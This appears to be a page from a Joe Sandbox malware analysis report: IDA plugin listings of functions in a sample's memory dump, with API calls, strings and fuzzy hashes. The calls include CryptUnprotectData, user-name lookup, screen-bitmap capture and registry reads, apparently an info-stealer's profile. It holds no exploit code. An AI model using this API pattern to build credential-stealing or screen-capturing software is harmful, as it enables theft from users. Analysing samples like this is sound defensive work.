Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: Cleanupclosesocketrecv
String ID:
API String ID: 3447645871-0
Opcode ID: a65aa17f3652ac5c2f88d8ab22a9580350dccecce7e0e89cb4434d6e405e2137
Instruction ID: 40385135899cdffc322c1361025e5a0ac2fc54d69d08ff880df69d12f7e26618
Opcode Fuzzy Hash: a65aa17f3652ac5c2f88d8ab22a9580350dccecce7e0e89cb4434d6e405e2137
Instruction Fuzzy Hash: 4C322571D012599FEB64DF68CD44B9DBBB4BB48300F1482AAE509B7291DB70AAC4CF61

Function 00DD8840 Relevance: 6.2, APIs: 4, Instructions: 235
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptUnprotectData.CRYPT32(AA85FA48,00000000,00000000,00000000,00000000,00000001,?), ref: 00DD8A50
LocalFree.KERNEL32(?,?,?,00000000), ref: 00DD8AA4

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: CryptDataFreeLocalUnprotect
String ID:
API String ID: 1561624719-0
Opcode ID: f34b9e55b27a650df485aff85fb9374cb570fe30e587f04946e5545c50c84302
Instruction ID: dd6cd46ed3bd88711e8ab2bc4f6810c575b35c02208c8a176e22d0b1b5f6e187
Opcode Fuzzy Hash: f34b9e55b27a650df485aff85fb9374cb570fe30e587f04946e5545c50c84302
Instruction Fuzzy Hash: 0391A071D103499BDB20CF68DC51BAEFBF4EF58700F24861EE851B6680EB706684CBA1

Function 00E04380 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 408timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00E047C5,00000000,00000000,00000000), ref: 00E04684

Strings

Eastern Summer Time, xrefs: 00E04731
Eastern Standard Time, xrefs: 00E0471D

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: InformationTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 565725191-239921721
Opcode ID: dc18a5b30da2726ca493510c6475e1d78073abb3e1331ce834aa1d1631ed4041
Instruction ID: 41f1c11113680f919bc7fe198f6cd84cf8f3bbcb7ed86f388eafb20ba50c8832
Opcode Fuzzy Hash: dc18a5b30da2726ca493510c6475e1d78073abb3e1331ce834aa1d1631ed4041
Instruction Fuzzy Hash: 99C124F1900115ABDB20ABA5DE42ABEBBA9EF05714F155066FA40FB2D1E7309F80C790

Function 00E149AF Relevance: 4.5, APIs: 3, Instructions: 35COMMONLIBRARYCODE

Download Yara Rule

APIs

FindClose.KERNEL32(000000FF,?,00E149DD,?,?,?,00DC7FB2,?,?), ref: 00E149BB
FindFirstFileExW.KERNEL32(000000FF,00000001,?,00000000,00000000,00000000,?,?,?,?,00E149DD,?,?,?,00DC7FB2,?), ref: 00E149EA
GetLastError.KERNEL32(?,00E149DD,?,?,?,00DC7FB2,?,?), ref: 00E149FC

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: Find$CloseErrorFileFirstLast
String ID:
API String ID: 4020440971-0
Opcode ID: eb6a5f83d0c9df498378fa0b27bc10419eaa86ba53e21fbbec65a3e17091041d
Instruction ID: d91fa80472e5c7627e62fc9b43f64231e04723d94186d49b7c34335accc9cfb0
Opcode Fuzzy Hash: eb6a5f83d0c9df498378fa0b27bc10419eaa86ba53e21fbbec65a3e17091041d
Instruction Fuzzy Hash: 00F05472000609BFDB111F65EC08DFE7B9DEB44370B108625B928A15F1D73189A19660

Function 00DE0E60 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00DE0E9E

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 499e0d964e1b39315932c0d8e3ba24d1fd1bb0a85b2c72372b2fc12fac2c6d04
Instruction ID: 749556a935df6c4fd24006de7ab659a3d037c5c925a362cede8cef0e64a7699d
Opcode Fuzzy Hash: 499e0d964e1b39315932c0d8e3ba24d1fd1bb0a85b2c72372b2fc12fac2c6d04
Instruction Fuzzy Hash: 060152719003188BD721DF25D805BDAB7F4EF48740F00469EE48AA7641DBB566C88BA1

Function 00E00FF0 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96fc92659c3faf74ad2f82c155e4d5ff1bc7a079bc79dca28c9c503b3cc2dbe1
Instruction ID: 841eed921881a394b4fdfdbaa19aba085ecf497931aaf6251b4a421753470c7e
Opcode Fuzzy Hash: 96fc92659c3faf74ad2f82c155e4d5ff1bc7a079bc79dca28c9c503b3cc2dbe1
Instruction Fuzzy Hash: 2EF0E531A10264DFCB22CB4CC805A99B3FDEB44B61F111096F580FB190C270DE80C7D1

Function 00DD9B00 Relevance: 71.0, APIs: 47, Instructions: 491
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 00DD9B70
GetCurrentThreadId.KERNEL32 ref: 00DD9BE5
GetCurrentThreadId.KERNEL32 ref: 00DD9C5A
GetCurrentThreadId.KERNEL32 ref: 00DD9CCF
GetCurrentThreadId.KERNEL32 ref: 00DD9D44
GetCurrentThreadId.KERNEL32 ref: 00DD9DB9
GetCurrentThreadId.KERNEL32 ref: 00DD9E2E
GetCurrentThreadId.KERNEL32 ref: 00DD9EA3
GetCurrentThreadId.KERNEL32 ref: 00DD9F18
GetCurrentThreadId.KERNEL32 ref: 00DD9F8D
std::_Throw_Cpp_error.LIBCPMT ref: 00DD9FD5
std::_Throw_Cpp_error.LIBCPMT ref: 00DD9FDC
std::_Throw_Cpp_error.LIBCPMT ref: 00DD9FE3
std::_Throw_Cpp_error.LIBCPMT ref: 00DD9FEA
std::_Throw_Cpp_error.LIBCPMT ref: 00DD9FF1
std::_Throw_Cpp_error.LIBCPMT ref: 00DD9FF8
std::_Throw_Cpp_error.LIBCPMT ref: 00DD9FFF
std::_Throw_Cpp_error.LIBCPMT ref: 00DDA006
std::_Throw_Cpp_error.LIBCPMT ref: 00DDA00D
std::_Throw_Cpp_error.LIBCPMT ref: 00DDA014
std::_Throw_Cpp_error.LIBCPMT ref: 00DDA01B
std::_Throw_Cpp_error.LIBCPMT ref: 00DDA022
std::_Throw_Cpp_error.LIBCPMT ref: 00DDA029
std::_Throw_Cpp_error.LIBCPMT ref: 00DDA030
std::_Throw_Cpp_error.LIBCPMT ref: 00DDA037
std::_Throw_Cpp_error.LIBCPMT ref: 00DDA03E
std::_Throw_Cpp_error.LIBCPMT ref: 00DDA045
std::_Throw_Cpp_error.LIBCPMT ref: 00DDA04C
std::_Throw_Cpp_error.LIBCPMT ref: 00DDA053
std::_Throw_Cpp_error.LIBCPMT ref: 00DDA05A
std::_Throw_Cpp_error.LIBCPMT ref: 00DDA061
std::_Throw_Cpp_error.LIBCPMT ref: 00DDA068
std::_Throw_Cpp_error.LIBCPMT ref: 00DDA06F
std::_Throw_Cpp_error.LIBCPMT ref: 00DDA076
std::_Throw_Cpp_error.LIBCPMT ref: 00DDA07D
std::_Throw_Cpp_error.LIBCPMT ref: 00DDA084
std::_Throw_Cpp_error.LIBCPMT ref: 00DDA08B
std::_Throw_Cpp_error.LIBCPMT ref: 00DDA092
std::_Throw_Cpp_error.LIBCPMT ref: 00DDA099
std::_Throw_Cpp_error.LIBCPMT ref: 00DDA0A0
std::_Throw_Cpp_error.LIBCPMT ref: 00DDA0A7
std::_Throw_Cpp_error.LIBCPMT ref: 00DDA0B5
GetCurrentThreadId.KERNEL32 ref: 00DDA124
std::_Throw_Cpp_error.LIBCPMT ref: 00DDA15F
std::_Throw_Cpp_error.LIBCPMT ref: 00DDA166
std::_Throw_Cpp_error.LIBCPMT ref: 00DDA16D
std::_Throw_Cpp_error.LIBCPMT ref: 00DDA174

Part of subcall function 00E15886: WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000,?,00000000,?,00DDA13D,?,00000000,00000000), ref: 00E15892
Part of subcall function 00E15886: GetExitCodeThread.KERNEL32(00000000,?,?,00000000,?,00DDA13D,?,00000000,00000000), ref: 00E158AB
Part of subcall function 00E15886: CloseHandle.KERNEL32(00000000,?,00000000,?,00DDA13D,?,00000000,00000000), ref: 00E158BD

Part of subcall function 00DF53DE: CreateThread.KERNEL32(00000000,00000000,Function_00065282,00000000,00000000,00000000), ref: 00DF5427
Part of subcall function 00DF53DE: GetLastError.KERNEL32(?,?,?,?,00DD9B51,00000000,00000000), ref: 00DF5433
Part of subcall function 00DF53DE: __dosmaperr.LIBCMT ref: 00DF543A

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: Cpp_errorThrow_std::_$Thread$Current$CloseCodeCreateErrorExitHandleLastObjectSingleWait__dosmaperr
String ID:
API String ID: 956486989-0
Opcode ID: be7453a44e0cdfd054bf691f7d198d8bd5a78d689caf93bcdc2d0988fc8f9b29
Instruction ID: d32702cbae2c7914d3ee0f6e84f55fdc7ca97042e91b4adce6d5c0cacd8d4d5c
Opcode Fuzzy Hash: be7453a44e0cdfd054bf691f7d198d8bd5a78d689caf93bcdc2d0988fc8f9b29
Instruction Fuzzy Hash: 14F1A9B1E81705EEEB28ABA4CC07BFE76B49F50740F144129F605792C1EAF15A84C6B3

Function 00DDE610 Relevance: 19.8, APIs: 13, Instructions: 267
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00DDE4B0: InitializeCriticalSectionEx.KERNEL32(00E38A08,00000000,00000000), ref: 00DDE502
Part of subcall function 00DDE4B0: GetLastError.KERNEL32 ref: 00DDE50C

EnterCriticalSection.KERNEL32(00000004,AA85FA48,00000004,00000000), ref: 00DDE668
GdiplusStartup.GDIPLUS(00000000,00000001,?), ref: 00DDE698
LeaveCriticalSection.KERNEL32(00000004), ref: 00DDE6A3
LeaveCriticalSection.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00DDE6D2
GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 00DDE6E0
GdipGetImageEncoders.GDIPLUS(?,?,00000008), ref: 00DDE765
GdipCreateBitmapFromScan0.GDIPLUS(?,?,00000000,0026200A,?,?), ref: 00DDE859
GdipSaveImageToStream.GDIPLUS(00000000,00000000,?,00000000), ref: 00DDE86C
GdipDisposeImage.GDIPLUS(00000000), ref: 00DDE877
GdipCreateBitmapFromHBITMAP.GDIPLUS(00000001,00000000,?), ref: 00DDE89E
GdipSaveImageToStream.GDIPLUS(00000000,00000000,?,00000000), ref: 00DDE8B1
GdipDisposeImage.GDIPLUS(00000000), ref: 00DDE8BC
GdipDisposeImage.GDIPLUS(00000000), ref: 00DDE8E4

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: Gdip$Image$CriticalSection$Dispose$BitmapCreateEncodersFromLeaveSaveStream$EnterErrorGdiplusInitializeLastScan0SizeStartup
String ID:
API String ID: 2917759359-0
Opcode ID: 3ad860faa81d0175225c260a23cba0b1caf996991b81b526ba535b87439dc999
Instruction ID: ffd87545a921020ca6426dde7dab589fe9fff700ee2d6a9629c9200e69d72c09
Opcode Fuzzy Hash: 3ad860faa81d0175225c260a23cba0b1caf996991b81b526ba535b87439dc999
Instruction Fuzzy Hash: 9791AB76D00219DFDB20AFA1D844BAEB7B4EF54710F29452AE905BB361E730EC45CBA0

Function 00E18E34 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E18B7B: CreateFileW.KERNEL32(00000000,00000000,?,00E18EDD,?,?,00000000,?,00E18EDD,00000000,0000000C), ref: 00E18B98

GetLastError.KERNEL32 ref: 00E18F48
__dosmaperr.LIBCMT ref: 00E18F4F
GetFileType.KERNEL32(00000000), ref: 00E18F5B
GetLastError.KERNEL32 ref: 00E18F65
__dosmaperr.LIBCMT ref: 00E18F6E
CloseHandle.KERNEL32(00000000), ref: 00E18F8E
CloseHandle.KERNEL32(00000000), ref: 00E190DB
GetLastError.KERNEL32 ref: 00E1910D
__dosmaperr.LIBCMT ref: 00E19114

Strings

H, xrefs: 00E19099

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: b0d44a7eacad708459daeceaf40a8ce0a2cd34cd1fc968e2af7da681dc44221b
Instruction ID: d336cdf428e991fab1a05e82e728785b3a0408bd4af9070ddd079f6c250455a3
Opcode Fuzzy Hash: b0d44a7eacad708459daeceaf40a8ce0a2cd34cd1fc968e2af7da681dc44221b
Instruction Fuzzy Hash: E4A16632A141589FDF299F68DC96BED3BA1EB0A314F14114DF811BB3D2CB318896CB91

Function 00E03209 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 298
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 00E0349E, 00E034A1

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3907804496
Opcode ID: f768000212527d69b40971149dc2f8fc733a335f3ea182ce6aae2c3cbed57d85
Instruction ID: d9842a716ba765059b28f3e2871b73d4af60828732666ea66b493bc7eda48611
Opcode Fuzzy Hash: f768000212527d69b40971149dc2f8fc733a335f3ea182ce6aae2c3cbed57d85
Instruction Fuzzy Hash: FAB121B0A0424DAFDB11DFA9C881BAEBBB9AF45304F149148E511BB3D2C770DE85CB61

Function 00DE1250 Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 548
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(ntdll.dll,AA85FA48), ref: 00DE130F
GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00DE131F
GetNativeSystemInfo.KERNEL32(?,00E2BB63,00000000), ref: 00DE139D
GetProductInfo.KERNEL32(?,?,?,?,?,00000000,?), ref: 00DE1804

Strings

RtlGetVersion, xrefs: 00DE1319
ntdll.dll, xrefs: 00DE130A

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: Info$AddressHandleModuleNativeProcProductSystem
String ID: RtlGetVersion$ntdll.dll
API String ID: 3292286288-1489217083
Opcode ID: 9f645340595e9fa24eb439a739a581d315ac07b13edd41ccc5c4a58a4f9bbaff
Instruction ID: b06689641772ba1312b638398d4418af476e5f86a8d145a1365af838d0e7a110
Opcode Fuzzy Hash: 9f645340595e9fa24eb439a739a581d315ac07b13edd41ccc5c4a58a4f9bbaff
Instruction Fuzzy Hash: 7232ADB4E012688FEB29CF28CC95BE9BBB1FF45314F0042E9D848AB291D7355A95CF51

Function 00DFEE37 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,AA85FA48,?,00DFEF44,?,?,?,00000000), ref: 00DFEEF8

Strings

api-ms-, xrefs: 00DFEE8E
ext-ms-, xrefs: 00DFEEA2

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 4f9d2ad0224c837c60192d703b62e2f84874f190c887b42880695075a97a0455
Instruction ID: 329c8c936fea5c7be1fc70d5774d5cd2a73638b489d9963e0d3f6114af018c00
Opcode Fuzzy Hash: 4f9d2ad0224c837c60192d703b62e2f84874f190c887b42880695075a97a0455
Instruction Fuzzy Hash: 1821E771A01229AFD7319B25FC44E6A7758DB52760F2A4161FE81B72E0DB30EE05C6F0

Function 00DEAE60 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 536
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 00DEB14F
___std_exception_destroy.LIBVCRUNTIME ref: 00DEB168

Strings

value, xrefs: 00DEB059, 00DEB32E

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: ___std_exception_destroy
String ID: value
API String ID: 4194217158-494360628
Opcode ID: 1305496e4dfc9ac95ce41c0062480a9f34487a5e73f1d191f81a3453f76964e3
Instruction ID: f5bd73f2e87eec70fa0c02ee97c40efd39af3abc8e741029fdcdac19788c216e
Opcode Fuzzy Hash: 1305496e4dfc9ac95ce41c0062480a9f34487a5e73f1d191f81a3453f76964e3
Instruction Fuzzy Hash: C222F2709002988FDB24DB29CC95BAEFBB5EF45310F1482DEE449A7782D7746A84CF61

Function 00DF9345 Relevance: 9.3, APIs: 6, Instructions: 264
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__allrem.LIBCMT ref: 00DF94CD
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DF94E9
__allrem.LIBCMT ref: 00DF9500
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DF951E
__allrem.LIBCMT ref: 00DF9535
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DF9553

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 3f5abee0268a5959bc4f93c338f3e46f71e127576a76c8be2f82913b75157386
Instruction ID: cb13299e50ff890e9387de7cc4405a06725e52467e7c0a5da030b9c09f5b1884
Opcode Fuzzy Hash: 3f5abee0268a5959bc4f93c338f3e46f71e127576a76c8be2f82913b75157386
Instruction Fuzzy Hash: 5A81E2B1A0070A9BE725AE78CC92B7AF3E8AF40320F25C529F615D63C1E770DA418760

Function 00DC7ED0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 142
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___std_fs_directory_iterator_open@12.LIBCPMT ref: 00DC7FAD
___std_fs_directory_iterator_advance@8.LIBCPMT ref: 00DC7FC5

Strings

., xrefs: 00DC829B
directory_iterator::directory_iterator, xrefs: 00DC7E08, 00DC7EE6

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: ___std_fs_directory_iterator_advance@8___std_fs_directory_iterator_open@12
String ID: .$directory_iterator::directory_iterator
API String ID: 3016148460-1999878393
Opcode ID: f43693e7260e197ea0e92bce0b5a3877c4fa2359db99ddf052fb2479d8d7c964
Instruction ID: 0c20e8470b61c3bbc99e1e28483912967b3cc5b38904871e7fc6b4bd3a25c585
Opcode Fuzzy Hash: f43693e7260e197ea0e92bce0b5a3877c4fa2359db99ddf052fb2479d8d7c964
Instruction Fuzzy Hash: B941D332A0420A9BCF18DF58E881FAEB7B5EF84325F14456DED05A7781E735A904CBB0

Function 00DC81E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___std_fs_directory_iterator_advance@8.LIBCPMT ref: 00DC8289

Strings

., xrefs: 00DC829B
directory_iterator::operator++, xrefs: 00DC832C
directory_iterator::directory_iterator, xrefs: 00DC8249

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: ___std_fs_directory_iterator_advance@8
String ID: .$directory_iterator::directory_iterator$directory_iterator::operator++
API String ID: 2610647541-1968560579
Opcode ID: 051a3ee1ab0742e6a749b8b4c5050fd2f73756f3d8b2e7dec49670bc16fdfccc
Instruction ID: 81fa1d329b9a6c3a81a7c0cacdb4257762d2e6b3aa3d4b8edf7f0e027a3bb783
Opcode Fuzzy Hash: 051a3ee1ab0742e6a749b8b4c5050fd2f73756f3d8b2e7dec49670bc16fdfccc
Instruction Fuzzy Hash: C0318171A046069BC720DF69C845F6BF7E4EF84710F14462DE865D7790EB75AC048BE1

Function 00DE5490 Relevance: 6.2, APIs: 4, Instructions: 198registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,00000000,AA85FA48,00000000,?), ref: 00DE555B
RegQueryValueExA.KERNEL32(00000000,?,00000000,000F003F,?,00000400,?,?,00000000,00020019,00000000,AA85FA48,00000000,?), ref: 00DE558F
RegCloseKey.ADVAPI32(00000000,?,?,00000000,00020019,00000000,AA85FA48,00000000,?), ref: 00DE5681

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
